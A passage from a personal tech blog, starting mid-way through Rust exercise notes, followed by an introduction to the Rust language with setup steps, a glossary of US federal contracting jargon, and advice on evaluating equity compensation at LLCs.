This is to say, hello() returns a reference to an immutable string literal. In other words, a pointer to the string “Hello, World!” and the caller of hello() cannot change that string using a dereference of this pointer. The reference is valid for the 'static lifetime, defined as the “duration of the entire program.” This is basically a guarantee to the caller that this reference will always be valid. String literals will always get a 'static lifetime because they’re hard-coded in the compiled Rust binary’s data section; they are never deallocated.

So, with a simple HelloWorld example we’ve had to introduce ourselves to the three big concepts unique to Rust: ownership, reference borrowing, and lifetimes. We’ve also tripped over the str/String duality and the concept of coercion. As we struggle to comprehend these concepts, they’ll be responsible for the majority of our compile-time errors. This is the Rust learning curve.

2: Gigasecond, and including external crates

Hint, for this one, you’ll be needing the Chrono crate, because the Rust standard library currently has no library for handling the concept of time. Your lib.rs file begins with:

extern crate chrono;
use chrono::*;

And your Cargo.toml file declares this dependency as well:

[dependencies]
chrono = "0.2"

When you cargo test, Cargo will automatically fetch and install the crate “Chrono” for you. Nice! Now you can add seconds to times and compare times to one another.

The instructions for this challenge may mislead you to try to use the caret as an exponentiation operator:

A gigasecond is 10^9 (1,000,000,000) seconds.

Yes, but Rust (like C before it) lacks an exponentiation operator. Not only does 10^9 not define the value 1_000_000_000, it also doesn’t generate a compile-time error. Instead, it is interpreted as the bitwise XOR of 10 and 9: in other words, 10^9 equals 3 (surprise, LOL). Again, the official Rust documentation (“The Rust Programming Language”) is a bit lacking with its complete absence of explanation of the operators that Rust actually has and does not have, a fundamental part of any language. Instead, you should consult the “Rust Language Reference” for this information. That said, if you really want to do exponentiation, several of the primitive types have exponentiation methods: the floating point types f32 and f64 which offer the powi(i32) method, and the integer types i32 and i64 which offer pow(u32).

let ten = 10_i64;
ten.pow(9)  // this is 1,000,000,000

3: Leap, and the modulus operator

There is little to learn from this exercise except the proper use of the % operator, which, again, was up to you to find in the Language Reference. It’s an “either you know this trick or you don’t” challenge, but popular in whiteboard programming questions in job interviews, and occasionally useful in real life. Example snippet:

// On every year that is evenly divisible by 4:
    if candidate_year % 4 == 0 {
        // Except every year that is evenly divisible by 100:
        if candidate_year % 100 == 0 {

4: Raindrops, and the modulus operator again

This is a simple integer-to-string (hint: some_value.to_string()) and integer-factoring challenge. Again, the modulo operator is all you need, and this exercise fails to add any new lesson really.

5: Bob, and iterators

Given some &str prompt you can iterate over every character in the string in a for loop, without having to use pointers or indices as a C programmer is tempted to do:

for character in prompt.chars() {
	// do stuff to each character
}

And in fact, it is basically impossible to loop across a str in any other way, because you cannot use array indexing on a str as you might with a string in C, and create a for loop that ranges from prompt[0] to prompt[prompt.len()]. Even for Rust types where that pattern is possible, it is discouraged: find your loop ranges using iterators, which are returned by methods like .chars() or .iter(). The code above automatically makes character a value of type char because prompt.chars() yields char values.

Rust’s char type has some handy methods, for example: if character.is_alphabetic() and if character.is_uppercase().

6: Beer Song, string concatenation, and the match statement

String concatenation in Rust is completely bonkers:

let a = "foo";
let b = "bar";

println!("{}", a + b);                          // invalid
let c = a + &b;                                 // invalid
let c: String = a + b.to_string();              // invalid
let c: String = a.to_string() + b.to_string(); 	// invalid

let c: String = a.to_string() + b;              // valid!
let c: String = a.to_string() + &b.to_string(); // valid!
c.push_str(" more stuff on the end");           // valid (if c is declared mut)!

The strings a and b here are &str values (string slices). The str type lacks any kind of concatenation operator, so you can’t use a + to concatenate them when the left operand is a str. However when the left operand is a String you totally can use the + because String does have the concatenation operator.

The String type is growable, whereas str is an annoyingly restricted type of data that mucks up everything it touches. You can’t build a str out of other str; you can’t even build a String out of two str without bending yourself into a pretzel. You may seek to avoid str altogether, but you can’t. Because every Rust string literal is a str, we are forced to work with both str and String, upconverting the former to the latter with .to_string(), and/or connecting them onto the end of a String with its .push_str() method.

But at least you can use the match keyword to help with this challenge:

// Form the appropriate English words to refer to the bottle or bottles:
fn bottles(quantity: u32) -> String {
    match quantity {
        0 => "No more bottles".to_string(),
        1 => "1 bottle".to_string(),
        _ => quantity.to_string() + " bottles",
    }
}

That’s a lot cleaner than an if / else-if / else would have been.

7: Difference of Squares

This one should be a review, you can use iterators (in the form of for-loop ranges), and exponentiation isn’t necessary if you just want to do squares:

let somevalue = 123;
let square = somevalue * somevalue;

8: Sum of Multiples

Another review challenge. Tests you again on using iterators, and the modulus operator (“is a multiple of x” is synonymous with “is cleanly divisible by x”). You might use nested loops, or maybe something fancier like closures. I think this post is long enough without addressing that concept.

9: Grains, and the panic macro

Back on exercise 2 we learned how to do exponentiation in Rust, so that’s half of this challenge. The other hint is that the unit tests are testing for error conditions indicated by “panic.” The way to panic in Rust is via the panic macro:

if s < 1 || s > 64 {
	panic!("Square must be between 1 and 64");
}

10: Hamming, unwrap, and the Result type

And finally (for now), we learn how to multiplex a return value and an error condition into one type, Result.

If we choose the return value for our function to be -> Result<i32, &'static str> then we are declaring that we might return either Ok(123) or Err("Something went wrong").

Some of the unit tests are checking to see if the returned condition is an error of any kind: .is_err(). Returning an Err(...) value satisfies that check.

Rust Initial Impressions

So after getting beyond “Hello world” and trying a few exercises, my initial impressions of Rust as a language are that its strictness is its defining characteristic. You could even say it’s a pain, honestly, not what I could call a joy to work in (although speaking ill of Rust invites the fans to show up and blame you for failing to love it). The payoff doesn’t have to be rapid prototyping joy, though, it just has to be the more secure code that you are ostensibly creating by being so strict and explicit about everything. That’s okay too.

The Good:

  • Cargo build tool
  • Passionate community
  • rustfmt for automated code style enforcement (cargo fmt)
  • Rust can be debugged with rust-lldb or rust-gdb, and this mostly works within VS Code
  • Expressive method names like .is_alphabetic() are a welcome improvement to the C standard lib

The Bad:

  • The official documentation for Rust’s language and standard library
  • Condescending comments like “I can tell you’re an imperative language guy” when you don’t use closures
  • Learning curve for the errors emitted by the Rust compiler
  • Your errors will all be compile-time anyway, for better or worse
  • Any time you have to use strings (String vs str, string concatenation, etc.) you will wonder if Rust will ever catch on

27 Feb 2017, 13:06

A Look at the Rust Programming Language

Where to Find More Execution Performance

Moore’s Law is just about done. It once described a trend of transistor count doubling every 24 months (enabled by increasing the density of transistors by making them ever-smaller). Now:

Between the introduction of 65 nm and 45 nm chips, about 23 months passed. To get from 45 nm to 32 nm took about 27 months, 28 months to go down from there to 22 nm and 30 months to shrink to the current 14 nm process. And that’s where Intel has been stuck since September 2014.

Intel might release 10nm scale chips in late 2017, which would mean that they worked 36-40 months in order to shrink from 14nm to 10nm scale. In other words, the most recent density doubling (the shrink from 22nm to 10nm), by the time it happens, will have taken over 5 years. The next doubling is likely to take at least that long, assuming the multiple breakthroughs required to do so can even be achieved. 10nm is already fairly close to the atomic scale: ~45 silicon atoms across (one atom: 0.22nm). One of the obstacles at this scale to be addressed is quantum tunneling, not that I pretend to understand it.

Of course, Moore’s Law can be satisfied one other way without changing density, which is to simply use bigger and bigger processor dies. You may have seen charts showing that transistor count continues to increase on schedule with Moore’s Law, but this is only true for dedicated GPUs and high-end server CPUs, which are already up against cost practicality limits due to these die sizes.

Even if we were still on track for Moore’s Law, increasing transistor counts alone have provided diminishing returns as of late. Recent density increases have mainly just served to reduce power draw and to make more space on the CPU die dedicated to graphics rendering (an ideal parallelizable task). Tech being an optimistic culture makes it slow to acknowledge the obvious truth here: CPU cores aren’t getting significantly faster. Unless your work is on a mobile device or can be delegated to a GPU or server farm, your only performance upgrades since 2010 have been I/O-related ones.

Granted, transistor density improvements have continued to increase CPU power efficiency. But I have an Intel “Core i7” (2.66 GHz i7-620M, 2-core) laptop that will turn 7 years old in a couple of months, and today’s equivalent CPUs still offer only a marginal performance improvement for tasks that aren’t 3D graphics. The equivalent CPU today, the Intel “Core i7” (2.7GHz i7-7500U, 2-core), has single-threaded performance only about 60% better than my CPU from 7 years ago. Not enough to make me throw out my old laptop.

All of this background is to make my point, which is that the next performance leap has to come from improved software, rather than relying on “free” improvements from new hardware. A few software methods for achieving a generational improvement in performance might be:

  • Parallelism
  • Optimizing compilers
  • Moving tasks from interpreted languages back to compiled languages

All of these things are already happening, but it’s the last one that I’m interested in most.

Parallelism

Parallelism has brought great performance improvements in graphics, “AI,” and large data set processing (so-called “Big Data”), and is the reason why GPUs continue to march forward in transistor count (although, again, check out those increasing die sizes; those are approaching their own limits of practicality). The problem with parallelism, though, is that while there are some workloads that are naturally suited to it, others aren’t and never will be. Sometimes, computing Task B is dependent on the outcome of Task A, and there is just no way to split up Task A. Even when parts of a task can be parallelized, there are swiftly diminishing returns to adding more cores, as described by Amdahl’s Law. What parallelized processing does scale well for is large data sets, although the home user is not typically handling large data sets, and won’t directly benefit from this kind of parallelism.

Optimizing Compilers

Here are Daniel J. Bernstein’s 2015 slides about the death of “optimizing compilers,” or rather, about the fact that despite all the hype about them, we are still manually tuning the performance-critical portions of our programs. The optimizing compilers’ optimization of non-critical code portions is irrelevant, or at least not worth the effort put into optimizing compilers. It appears that for a compiler to generically optimize any code as well as an expert human could, it would require something like a general AI with a full contextual understanding of the problem being solved by the code. Such a thing doesn’t exist, and is not on the horizon.

Better (Safer) Compiled Languages

C and C++ never really left us, and neither have all of the inherent memory errors in code programmed in C and C++. That includes Java, whose runtime is still written in C. The Java runtime has been the source of many “Java” security issues over the years, to the point where the Java plug-in was effectively banned from all web browsers. Despite that, the rest of the browser is also written in C and C++, and just as prone to these problems. There hasn’t been any viable alternative but to try to sandbox and privilege-reduce the browser, because any safer language is too slow.

The real cost of C and C++’s performance is their high maintenance burdens: coding in them means always opening up subtle concurrency errors, memory corruption bugs, and information leak vulnerabilities. This is why simply improving the C++ standard library and adding more and more features to the language has not altered its basic value proposition to developers, who have already fled to “safe” languages.

That’s where the experimental language, Rust, comes in. It’s a compiled systems programming language with performance on par with (or better than) C++, but with compile-time restrictions on memory management and concurrency that should prevent entire classes of bugs. At some point in the next 5 years, I predict that we will see Rust (or something like it, whether it’s Swift or some new really strict C++ compiler) slowly start replacing C/C++ wherever performance and security are both primary concerns. It’s exciting to think that a well-designed compiled language could solve most of the reasons for the ~20-year flight away from native code programming.

Having played with Rust for a few days, I can say it will certainly not replace Python for ease of development, but it’s a really interesting disruptor for anyone writing native code. Security researchers should also take notice.

Rust Programming Language

For what it’s worth, Rust was the “Most Loved Programming Language of 2016 in the Stack Overflow Developer Survey.” It enforces memory management and safety at compile-time. Some memory safety features of the language include:

  • Rust does not permit null pointers or dangling pointers. Since pointers are never NULL, you can always safely dereference a pointer.

  • There are no “void” pointers.

  • Pointers cannot be downcast to a more specific type, only upcast to a more generic type. If generic data structures are needed, you use parameterized types/functions.

  • Variables can be allocated on the heap and are cleaned up without the need for “free” or “delete.”

  • Concurrent-access race conditions are impossible, because every piece of data is either:

    • mutable (reference from a single “owner” at a time, owner re-assigned if needed) OR
    • immutable (multiple references can exist)

(there can be only one mutable reference, or an arbitrary number of immutable references to the same allocation, but never both [credit: @vitiral])

If you just wanted a statically typed, compiled language with a modern standard library that is easy to extend, you could also choose Go. But Rust claims to be all of that, plus faster and safer. Rust will work in embedded devices and other spaces currently occupied by C/C++; Go will not. Some think Rust is just fundamentally better, but I am not qualified to judge that.

Rust and parallelism

Rust makes parallelization an integral part of the language, with support for all of the necessary parallel programming primitives. Parallelized versions of various programming constructs can be swapped in without changing your existing code. This is possible because the Rust language forces the programmer to specify more about how data will be used, which prevents race conditions at runtime by turning them into errors at compile time, instead.

Concept of “Ownership” in Rust

The major innovation of the Rust language (inspired by a prior language, “Cyclone”) is that its compiler, in order to do memory management and prevent race conditions at compile time, tracks “ownership” of all variables in the code. Once a variable is used (like in a call to a function) it is considered to be passed to a new “owner,” and using it in a subsequent statement is illegal and would trigger a compiler error. If the developer’s intention was to copy-on-use (“clone”), they must specify that in their code. For certain simple data types (integers, etc.), they are automatically copied-on-use without any explicit intent from the developer. Another aspect of ownership in Rust is that all variables are (what in C/C++ would be called) const, by default. In Rust, if you want a variable to be mutable, it has to be explicitly stated in the declaration.

This concept is the foundation of the Rust language. It’s hard to grasp at first, since it is very different from programming in C or C++, or even Java. The most detailed explanation of Rust ownership that I’ve seen is this article by Chris Morgan, but to actually learn the concept I’d recommend starting with this 25 minute video by Nikolas Matsakis.

At first, it seems like another mental burden on the programmer, but adopting this concept of memory management means the programmer is also relieved of having to manage memory with carefully paired calls to malloc() and free() (or new and delete). “So what, isn’t this what you get with C# or Java?” Not quite: those languages use a Garbage Collector to track references to data at runtime, which has an inherent performance overhead and whose “stop-the-world” resource management can be inconsistent and unpredictable. Rust does it in the language, at compile time. So, without the use of a Garbage Collector, Rust makes memory management (and concurrent access to data) safe again.

Rust is a Drop-In Replacement for C

Just like C/C++, Rust can be coupled to Python or any other language with a native interface, in order to leverage the strengths of both. And, debugging Rust programs is officially supported by GDB. This works the other way around too, i.e., you can build a Rust program on top of native code libraries written in C/C++. Mozilla is even working on a web browser engine in Rust, to replace Gecko, the Firefox engine. Benchmarks in 2014 showed a 300% increase in performance vs Gecko, and by early 2016, it was beating Webkit and Chrome as well (at least in some hand-picked benchmarks where they leverage Rust’s ease of parallelism to delegate a bunch of stuff to the GPU). If you’re interested in the details of how Rust can improve browser engines, Mozilla wrote about it here. Buried in the paper is a detail that they seem to have downplayed elsewhere, though: the new browser engine is actually still bootstrapped by an existing codebase, so it’s still 75% C/C++ code. On the other hand, that also goes to show how Rust integrates well with C/C++.
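
As a minimal, hedged sketch of what that interoperability looks like (my own example, not Mozilla’s code): a Rust function can be exported with a C calling convention for C (or Python via ctypes) to call, and C library functions can be declared and called from Rust:

// Export a Rust function with a C ABI and an unmangled name, so C (or Python's
// ctypes) can call it when this crate is built as a library.
#[no_mangle]
pub extern "C" fn add(a: i32, b: i32) -> i32 {
    a + b
}

// Declare a function from the C standard library so Rust can call it.
extern "C" {
    fn abs(input: i32) -> i32;
}

fn main() {
    // Calling foreign code is outside Rust's safety guarantees, so it requires `unsafe`.
    let x = unsafe { abs(-3) };
    println!("abs(-3) = {}, add(2, 2) = {}", x, add(2, 2));
}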

Rust has a Package Manager, which is also its Build Tool

Makefiles are impossible to write and debug, and basically you’re always just copy-pasting a previous Makefile into the new one, or hoping an IDE or build tool abstracts away all that crap for you, which is why this wheel has been reinvented many times. I generally don’t have a favorite build tool (they’re all bad), since it always seems to come down to a manual troubleshooting cycle of acquiring all the right dependencies. The worst is having a build system that is a big layer cake of scripts on top of XML on top of Makefiles.

Rust’s package manager, “Cargo,” simply uses TOML files to describe what a Rust project needs in order to build, and when you build with Cargo, it just goes out and gets those dependencies for you. Plus, the packages are served from Crates.io, so if you’re keeping score that’s a double tech hipster bonus for using both the .io domain and TOML.
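
A minimal Cargo.toml looks something like this (the package name and the dependency line are made up for illustration):

[package]
name = "hello"
version = "0.1.0"
authors = ["Your Name <you@example.com>"]

[dependencies]
# Cargo downloads and builds these from crates.io at build time.
rand = "0.3"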

Installation and Hello World

Assuming you’re using MacOS like me (there is plenty of info out there already for Windows and Linux users) and you have Homebrew:

    $ brew install rust
    $ rustc --version
    rustc 1.15.0

You probably want an editor with Rust syntax highlighting and code completion. These are your choices. I went with Visual Studio Code, aka VS Code. It’s not what I’d call an IDE, and I still haven’t gotten it to integrate with a debugger, but hopefully JetBrains will step up and make a Rust IDE – once there is a market for it.

VS Code doesn’t understand Rust out of the box. Launch VS Code and hit Command-P to open the in-app console:

ext install vscode-rust
(install the top search result, should be the extension by kalitaalexey)

Optionally, you can install a GDB/LLDB integration layer to attempt to debug from VS Code (in theory – YMMV but I haven’t gotten it to work for LLDB with C++ yet, let alone Rust):

ext install webfreak.debug
(install the top search result)

Notice in the bottom right: “Rust tools are missing” … click install. It will invoke Cargo (the Rust package manager) to download, compile, and install more of the Rust toolchain for you: racer, rustfmt, rustsym, etc. And all of the dependencies for those. Go have a coffee, this will take a while. About 18 minutes on my system.

Finally: close VS Code, and open up Terminal so we can put all these new Rust binaries on your $PATH.

$ open -a /Applications/TextEdit.app ~/.bash_profile

Add the line export PATH="/Users/yourusername/.cargo/bin:$PATH" and save.

Open a new instance of VS Code. It should no longer tell you that Rust tools are missing. 👍🏻

Test the environment with a Hello World in Rust! Save the following as hello.rs:

fn main() {
    println!("Hello World!");
}

Open “View -> Integrated Terminal.” From here you can compile by hand like a peasant, because VS Code isn’t an actual IDE.

bash-3.2$ cd ~/Desktop
bash-3.2$ rustc hello.rs
bash-3.2$ ./hello
Hello World!

For a more realistic workflow, we could also have used Cargo to create a new Rust project and then build it.
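
For example, something like this (a sketch of the usual Cargo workflow; the project name is arbitrary):

    $ cargo new hello_cargo --bin
    $ cd hello_cargo
    $ cargo build
    $ cargo run
    Hello, world!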

In a future post, I will share my thoughts on what it’s like to try to actually write a program in Rust.

Rust References

21 Feb 2017, 13:45

Government Contracting Jargon

Whether you’re just starting work for a business that does federal contracting or you’ve been doing it for a long time, you know that the contracting and administrative side of the business speaks its own language. Mostly this is the language of federal acquisition. Acquisition, here, refers to the process of the government acquiring a product or service from the private sector – also known as procurement. The process is defined and codified in a regulation called the Federal Acquisition Regulation (FAR).

Jargon is nowhere near the hardest part of administering or operating a successful contracting business, but it is one intimidating factor that can prevent the tech experts working for federal contractors from participating in the leadership roles at their company. So if you get familiar with the terminology of the bureaucracy, you can at least get that out of the way and focus on the difficult parts, like the business plan and the customer relationships. In my experience, those who’ve mastered these concepts seem to have no interest in sharing their knowledge. It’s almost as if keeping the technical staff in the dark about the administrative functions is what justifies the rigid boss/employee dichotomy.

Codes that Register A Business with the Government

DUNS Number

A credit bureau for businesses known as Dun & Bradstreet assigns these unique nine-digit identifiers. A DUNS number is used to establish a business credit file, which is often referenced by lenders and potential business partners to help predict the reliability and/or financial stability of the company in question. DUNS stands for “Data Universal Numbering System” but really it’s just a convenient backronym to incorporate the firm’s name. You have to have a DUNS number to bid for federal government contracts. It’s free to obtain one, unless you want it expedited.

EIN: Employer Identification Number

When you register a company with the IRS for tax-filing purposes, you receive one of these EINs. If you’ve ever received a W-2 statement as an employee, you’ve seen that the EIN for your employer is on the form.

SAM: System for Award Management / CAGE Code

SAM is a fairly new system that replaces several redundant systems that existed previously. Any company that would like to do business with the federal government, or needs to report subcontract information, must register on the System for Award Management (SAM). So after you have an EIN and a DUNS, you can go to the SAM and register, after which you will receive a CAGE Code (Commercial and Government Entity). This is yet another unique identifier for your business, required for any company that does federal contracting. Applying for a CAGE code also requires knowing your NAICS code (see below) that categorizes what your business does. A company’s SAM status has to be renewed every year, but at least there’s no fee.

Optional and for small businesses only: there’s an additional directory through which government procurement officers can find you, called the DSBS (Dynamic Small Business Search). When registering with the SAM system, you can also create a DSBS profile there.

Codes that Categorize Product & Service Offerings

In an attempt to standardize purchases, the government has come up with multiple (redundant) classification codes. In other words, they’ve attempted to create a taxonomy of commoditized goods and services. Like all taxonomic follies, the inherent assumption here is that every offering from a business can be cleanly classified as this or that, and that the whole exercise is useful for something. In this case, it is supposed to assist government buyers in finding sellers (although this is not really how they find sellers) and it might assist sellers in determining who is buying a particular thing (although that too does not really work in practice). The more specialized and hi-tech your offering, the less useful it is to try to fit it into a code classification.

So, choosing your own category codes is dicey, and you should not choose them based purely on your own judgment, but rather on what your intended customers are purchasing. If you do some reconnaissance on public databases of past contracts, you can check what codes your competitors have used. Those are probably the ones you will use as well.

NAICS Codes

There are over 1200 of these North American Industry Classification System codes, defined by the Census Bureau or possibly the Office of Management and Budget. This is the categorical bin you’re placing your business in. You’d choose it based on a careful review of what code your customer buys, not which one you think is most appropriate.

PSC: Product Service Codes

These are similar to NAICS codes, but as a categorical bin for the product or service being sold, as opposed to your business itself. There are even more of these: roughly 2300. They are defined by the GSA.

Use these codes for research: find bidding opportunities on FedBizOpps, or find past contracts on the Federal Procurement Data System (and the agencies that awarded them). You can also find your competition: go to the Dynamic Small Business Search and enter your NAICS or PSC codes.

NIGP Codes

NIGP stands for The National Institute of Governmental Purchasing, but it’s just another code for categorizing products and services. This one predates NAICS, and is only relevant at the state and local levels, so we’ll ignore it here.

The GSA Schedule

GSA is the General Services Administration. The “GSA Schedule” is like a collection of pre-negotiated prices, sort of an accelerated buying process for commodity goods and services, where the focus is price. The term itself is a little misleading, as there are actually 39 GSA Schedules categorized by products and services, like schedule 70: IT Services.

It requires a cumbersome application process that asks you to provide several years of past performance, and a commitment to sell at least $25k/year of goods or services through this contracting vehicle. Being on the GSA Schedule might be a competitive edge for mid-size or larger businesses. But as a small business you’d probably just subcontract to one of the 20,000 businesses that are on the GSA Schedule.

SIN: Special Item Number

Under a particular GSA schedule, there may be subcategories for more specific goods or services. These are identified by SINs, another GSA-provided identifier. So if you are on Schedule 70 (IT) you might be selling a service under the Cloud SIN (132-40) that applies to cloud services, or if you’re just consulting maybe you’d use the broad “IT Professional Services” SIN (132-51). As of October 2016 there are even a few SINs for cybersecurity services.

Small Business Set-Asides

The federal government has a mandate to deliver 23% of its prime contracts to small businesses. Just being a small business means there are opportunities marked for you, but many entrepreneurs also look to certify under an officially recognized disadvantaged status so that they bid for even more exclusive “set-asides.” Set-asides are federal contracts that restrict bidding to only members of certain qualifying groups. Not only that, but sometimes small businesses can receive sole-source contracts, also known as no-bid contracts.

The Small Business Administration (SBA) is an agency of the federal government set up to provide support to entrepreneurs and small businesses, through loan guarantees and these special “disadvantaged status” programs. The SBA defines most of the disadvantaged-status titles that you see attached to company profiles. “Joe’s Cyber Shop: a Service-Disabled Veteran-Owned Small Business.” There’s at least one other status, Veteran-Owned Small Business, that is certified by the Department of Veterans Affairs rather than the SBA.

8(a) Business Development Program

This program (named for a section of the Small Business Act) is for businesses owned by socially and economically disadvantaged individuals. An eligible business needs to apply for this status with the SBA, and be certified. Once a business is certified, the SBA offers it specialized business training, counseling, marketing assistance, and high-level executive development.

HUBZone

Historically Underutilized Business Zones (HUBZones). If the company’s principal office is located in one of these zones and 35% or more of its workforce resides in one, it can receive this other kind of preferential status. There’s a map of these zones on the SBA site. No, it isn’t broken; it just really is that slow. Chances are these are not desirable places to move your headquarters and yourself to, solely for the chance that you might have an edge in competing for contracts. But even if you did relocate, you’ll probably lose the status as soon as you make your first hire. You’ll be competing for highly skilled individuals to work technical contracts, and you’re just not going to find people like that living around a recently closed military base.

Procurement Terms

There are a whole host of terms related to the government’s offering of contract opportunities, and the contracting industry’s pursuit of them. Quickly, here are some common ones:

  • BAA: Broad Agency Announcement. This is how the government solicits for proposals for research and development (specifically). If the government agency is looking for specific products or services rather than basic and/or applied research, then they will issue an RFP instead of a BAA.
  • BD: Business Development. This is a pretty loosely-defined term. If used by an engineer, “BD guy” might be considered an insult. Sometimes BD is proposal-writing, sometimes it is relationship-building.

  • COTS: Commercial Off-The-Shelf. This is a term used to refer to anything that can be commercially purchased or is for sale to the general public. Also see GOTS.

  • FPDS: the Federal Procurement Data System. This is a database that is intended to be a single source for government-wide procurement data (information about awarded contracts). It’s a reporting system. What I’ve found is that not all contracts get reported here, so there must be some exceptions. You can use it to recon your competition, but perhaps don’t rely on it too much.

  • GOTS: Government Off-The-Shelf. As opposed to COTS, something that is GOTS is not for sale to the general public, and typically is developed by the technical staff of one federal agency (or an outside source at their direction), for use by them and/or other government agencies. This is rare, compared to COTS.

  • GFP / GFE: Government Furnished Property / Equipment. Any time the government offers its own equipment in order for a contractor to perform a task, it is referred to as GFE. Technically, GFE is a kind of GFP. Another kind of GFP is GFM (Material). You may also see GFI (Information).

  • RFI: Request for Information. This is not a solicitation for proposals, it’s much more preliminary than that. If the government needs more information in order to create a good RFP, then it will put out an RFI. Sometimes the desired response to an RFI is a capabilities statement: the government occasionally wants to know which contractors are available to perform certain kinds of work. They may use an RFI as a process by which to accept a short (generally 5-10 pages) profile of your company’s offerings and qualifications.

  • RFP: Request for Proposal. When the government knows its problem (not basic or applied research) but wants proposals with approaches and prices, then they put out an RFP.

  • SoW: Statement of Work. There are many formats and templates for what a SoW must include, but basically it is a list of obligations that the contractor states they will fulfill on the contract.

  • WBS: Work Breakdown Structure. This is project manager speak for the work that needs to get done, in outline form. That’s it, it’s an outline. But listen to this pretentious definition they teach in business school! “A hierarchical decomposition of the total scope of work to be carried out by the project team to accomplish the project objectives and create the required deliverables.”

Contract Terms

I’ll make another blog post later about contract types, which is too much to cover here. But there are a few common terms to define up front, related to reading the contracts themselves:

  • CDRL: Contract Data Requirements List. This might be specific to military contracts. Some might pronounce it “see drill.” It is a list of deliverables that the contractor is responsible for producing for the government. It is derived directly from the contractor’s Statement of Work in their proposal.
  • CLIN: Contract Line Item Number. CLINs are specified in the FAR part 4.10. I think for the contractor, they are basically just numbers that identify deliverables. On the government side, it’s part of an accounting and traceability system.
  • CO: Contracting Officer. This is the government person with the authority to enter into, make changes to, or terminate a government contract. In other words, they have been delegated the authority to represent the government in the contracting process.

  • COR: Contracting Officer’s Representative. This is a person who helps the CO administer the contract with the performer. The COR is not authorized to make any commitments or obligations on behalf of the government.

  • COTR: Contracting Officer’s Technical Representative. A COTR is a particular kind of COR, designated by the CO to be their technical liaison. It’s often the case that the CO does not have a sufficient understanding of the specialized work being performed on the contract in order to accurately assess its progress, and this is when they appoint a COTR. Again, the COTR is not authorized to make any commitments or obligations on behalf of the government. Only the CO is.

13 Feb 2017, 23:41

Evaluating Equity as Compensation

The traditional model of entrepreneurship is:

  1. concept
  2. plan
  3. venture funding
  4. exit

It seems like most people just unquestioningly accept that this is the natural sequence of events, but why is it this way? Isn’t there something missing from this? Like what about the focus on the customer, or about actually making a great service or product? If a business is working, why do you need to leave? What’s the rush? Why do you immediately go from borrowing money to looking for a buyer? This sounds more like house flipping than entrepreneurship. Accepting venture capital funding means accepting their short-sighted outsider influence, and this is what creates the pressure for an exit (rather than the creation of a stable, sustainable business).

The frothy market of dollar-chasing VC-backed pump & dump schemes is probably the worst way to try to generate a world-changing technological breakthrough. We live in a world where every problem left worth solving is a difficult multi-disciplinary one that requires long-term-horizon thinking. If you are just planning to make money, you may not care. If you are paying some lip service to making the world a better place, though, this seems like a case of some misaligned values.

What about the technical staff, in all of this? The scientists, engineers, programmers. They get left holding the bag on step 4, that’s what. They get rolled. At best, after “exit,” they have a new management team and a 5-10% retention bonus for a couple of years. More likely, everything they liked about the job culture goes out the window and they get to watch the 2 or 3 founders drive off in their new luxury sport sedans, with a cash cushion that makes them set for life. At worst, the technical staff will get laid off shortly after the acquisition and/or the business will implode.

Most people over the age of 25 have become wise to this trajectory of events. For tech labor, it’s theoretically still a seller’s market (seller, here, being the employee in the employee-employer relationship). So prospective employees naturally want to be paid not just a salary, but to actually feel like they are sitting at the table. High-value employees want to be cut in (to use another poker metaphor). If you as the employer don’t cut them in, science has shown: you will be getting 5% less value out of them than you could be, if you can even hire and retain them in the first place.

Offers of equity to new employees are exceedingly common in venture-capital startup land. But even in government land, it’s not unheard of to work for a company with strong employee-ownership values. SAIC is (was, before its board took its stock public and then the model imploded) one well-known success story, and in the early 2000’s I worked for another lesser-known company that used an identical compensation system (the founders of the two companies were friends, actually, and launched the companies in parallel). I have actually worked under a few different equity models over the years: a fully-employee-owned model (some in stock, some in NQO options), a profit-sharing “equity” model, and a no-equity model.

Business finance is not my specialty, but I believe that we as engineers should not adopt a learned helplessness. Many of us have a disinterest in the topic of money. Yes, equity compensation is complicated – even suspiciously so – and dry. Boring, even crass. But we should take an interest in ourselves, because nobody else will. Don’t accept being exploited. This is about the empowerment of labor vs. capital.

The Open Guide to Equity Compensation is a community project to aggregate information to help improve the financial literacy of people in tech, specifically, to spread the kind of sophistication necessary to evaluate a compensation offer that is either all or partially made in terms of company equity. If you’ve never read this guide, do so now! There is seriously good info there, and you may save yourself from making an expensive mistake.

The Open Guide still has a gap when it comes to LLCs, though, so I will add some wisdom from personal experience. If you plan on working at a small less-established or newly established LLC, and are considering an equity offer:

  • know that LLCs’ equity-sharing structure is different from that of corporations, and advice on LLC equity is much harder to find, since LLCs are newer and less common than corporations
  • the equity offer should be in writing, signed
  • the offer should specify the award and vesting timeline. If an option award, it should specify the award price
  • the offer should specify the valuation method
  • the offer should be in percentage terms, not in terms of some malleable unit (fraction with an unknown denominator)
  • the offer should contain no loophole words like “intend to,” but be worded as a commitment, like “shall” or “will”
  • if the equity-sharing plan structure is still TBD, consider the offer worthless

Especially that last bullet, since it supersedes everything else. Once you accept the offer of employment, you lose all leverage. Once you have lost leverage, your “equity” (if you ever get it) will be defined as something worth nearly zero, in a way that most favors the company. Your award of, say, a defined percent of the valuation of the company can be interpreted to mean an option grant to purchase some equity. Remember, it’s not an award if you have to buy it, it has no present value if you have to buy it at-or-above the present value when granted, and it’s not worth anything if you can’t sell it. Check: are you basically buying an illiquid asset with a tax consequence? Is this thing going to pay dividends until you can sell it? And for an LLC, also realize that you might have to give up employee (W-2) status and start paying more taxes on your salary, too.

See, with LLCs, you cannot get stocks, you can only get “membership interest units.” In an LLC, equity might be in the form of Profits Interest Units (not to be confused with profit sharing). “Profit interest” is a junior form of equity in every sense of the term – if you want the Big Boy equity (ownership) in an LLC you want “Capital Interest.” Either way though, unlike a stock, these two kinds of LLC Interests may be restricted in a way that prevents them from being freely transferred. You might have to hold it until the company itself is sold. And there are complicated consequences for taxation and accounting, that all threaten to make them more trouble than they are really worth, especially for small amounts.

Here is a table to help roughly compare LLC equity offers with traditional corporation equity offers.

| Equity in a C- or S-Corporation | Equity in an LLC (the closest parallel) |
| --- | --- |
| Stock Option | Profits Interests Units, or Options for Capital Interests |
| Restricted Stock Units (RSU) | Capital Interests Units |
| “Phantom Stock” | (Membership Interest) Unit Rights, a.k.a. “Phantom Equity” |
| Stock Appreciation Rights (SAR), a.k.a. Phantom Stock Option | (Membership Interest) Unit Appreciation Rights |

The more established an LLC company is, the less attractive a Profits Interest Unit becomes, relative to a Capital Interest Unit. That is because a Profits Interest value is only in the future appreciation of the value of the company, whereas a grant of Capital Interest is an immediate share of the value of the LLC as of the date that the interest is granted. In addition, the longer an employer can drag its feet and delay the award of a Profit Interest Unit, the less value it is to you. That’s why award date, strike price, and vesting schedule are all very important.

